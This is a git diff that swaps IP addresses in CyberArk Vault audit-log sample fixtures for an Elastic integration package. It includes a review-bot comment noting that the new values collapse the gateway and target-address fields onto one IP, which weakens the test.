System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n testing\n \n 
Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use 
Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use 
Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} 
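Review bot: On the new side of this hunk, the testark records (the `+<5>1 2021-03-14T13:49:35Z` line through the `+<5>1 2021-03-16T10:04:49Z` line) now carry the same value, 67.43.156.15, in both the `Address` CAProperty and `GatewayStation`, whereas the removed lines kept the managed-account address (34.123.103.115) and the gateway (34.71.250.247) distinct. With both fields collapsed to one address, the fixture can no longer reveal whether the pipeline populates a given ECS field from the gateway or from the target account — a swapped or duplicated mapping would produce identical expected output. The same collapse appears to have been applied in the preceding 302 hunk, where `Station`, `DstHost` and `Address` all read 67.43.156.15 (its removed side is not visible here, so this is inferred). Consider keeping gateway and target on different addresses from the supported subset, e.g. leaving `"Address","Value":"67.43.156.15"` and giving `GatewayStation` a third address that is not reused elsewhere in the record, so each IP-bearing field keeps a unique value in the test data.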
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/309_undefined_user_logon.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/309_undefined_user_logon.log
index 18c5b7e67fb..a74b537c1b4 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/309_undefined_user_logon.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/309_undefined_user_logon.log
@@ -1,5 +1,5 @@
 <7>1 2021-03-08T18:31:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:31:52","IsoTimestamp":"2021-03-08T18:31:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansr","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}}
 <7>1 2021-03-08T18:32:03Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:03","IsoTimestamp":"2021-03-08T18:32:03Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansra","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}}
-<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}}
-<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"81.32.170.205"}}}
-<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"34.71.250.247"}}}
